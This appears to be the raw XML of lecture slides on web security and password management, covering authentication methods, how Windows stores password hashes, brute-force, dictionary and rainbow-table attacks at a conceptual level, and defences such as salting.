              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Subject   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Key   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Extensions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(X.509 v3)       </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42064372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Web Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-TW" dirty="0">
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101379" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web now widely used by business, government, individuals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp; Web are vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a variety of threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Denial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> (DOS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>added security mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="zh-TW" dirty="0">
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15155597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
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13727728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Identification and Authentication Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Biometrics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13415241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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most common authentication technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Weakest form of protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users typically choose passwords that are easy to remember and therefore easy to guess or crack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomly generated passwords are hard to remember; thus, many users write them down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passwords are easily shared, written down, and forgotten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passwords can be stolen through many means, including observation, recording and playback, and security database theft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Passwords are often transmitted in clear text or with easily broken encryption protocols.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Short passwords can be discovered quickly in brute-force attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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187657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The Increasing Threat of Attackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFill>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:uFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676520"/>
            <a:ext cx="3580920" cy="2441160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876920" y="1905120"/>
            <a:ext cx="3295440" cy="2685600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="4343400"/>
            <a:ext cx="1447560" cy="36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rPr>
              <a:t>Past</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718960" y="4354560"/>
            <a:ext cx="1447560" cy="36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rPr>
              <a:t>Now</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Types </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Static passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>always remain the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>change after a specified interval of time or use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One-time passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or single-use passwords are a variant of dynamic passwords that change every time they are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5302373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Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cognitive password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A series of questions about facts or predefined responses that only the subject should know. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For example, three to five questions might be asked of the subject, such as the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> What is your birth date?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> What is your mother’s name?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> What is the name of your division manager?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> What was your score on your last evaluation exam?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> Who was your favorite player in the 1984 World Series?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28701247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Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reversible versus irreversible encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134658558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Passwords is stored?</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152525" y="2081213"/>
            <a:ext cx="6838950" cy="3914775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5790976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Windows Stores Passwords?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LM “hashes”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Old technology used on LAN Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NT hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MD4 hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for authentication on more recent Windows systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3787928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Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Network traffic analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Brute-force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Dictionary attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Try different passwords from a list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Succeeds only with poor passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Very fast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Pre-computation Brute force attacks (Rainbow tables) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Hybrid attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Start with Dictionary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Insert entropy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Append a symbol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Append a number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Relatively fast</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Social-engineering attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409721466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Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute Force Attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Try all possible passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More commonly, a subset thereof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually implemented with progressive complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very slow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All passwords will eventually be found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19929414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Tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pre-compute hashes into sorted table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trade CPU for memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Takes a lot of time to pre-compute, but makes cracking a hundred times faster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3520114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Pre-computation Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Preventing pre-computation attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent hashes from being exact representations of passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unix -&gt; salted MD5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Windows -&gt; NTLMv2 uses domain name, server challenge and other variables to randomize final hash to protect against pre-computation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239671902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increase password security?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use the strongest form of one-way encryption available for password storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Never allow passwords to be transmitted over the network in clear text or with weak encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Use password verification tools and password-cracking tools against your own password database file. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Disable user accounts for short periods of inactivity, such as a week or a month. </a:t>
            </a:r>
